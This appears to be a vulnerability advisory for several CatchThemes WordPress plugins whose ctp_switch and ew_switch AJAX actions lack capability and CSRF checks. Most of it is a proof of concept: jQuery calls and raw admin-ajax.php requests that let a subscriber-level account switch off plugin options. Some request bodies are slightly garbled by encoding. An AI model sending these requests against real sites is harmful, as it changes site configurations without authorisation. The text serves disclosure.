Multiple Plugins from the CatchThemes vendor do not perform capability and CSRF checks in the ctp_switch AJAX action, which could allow any authenticated users, such as Subscriber to change the plugin’s configurations.
PoC
- Turn off “Turn On Catch Themes & Catch Plugin tabs” jQuery.post(ajaxurl,{ action:“ctp_switch”, option_name:“theme_plugin_tabs”, value:“false” }) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 59 Connection: close Cookie: [subscriber+] action=ctp_switch&option;_name=theme_plugin_tabs&value;=false 2) Turn off “EW: Authors” jQuery.post(ajaxurl,{ action:“ew_switch”, option_name:“ew_authors”, value:“false” }) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 59 Connection: close Cookie: [subscriber+] action=ew_switch&option;_name=ew_authors&value;=false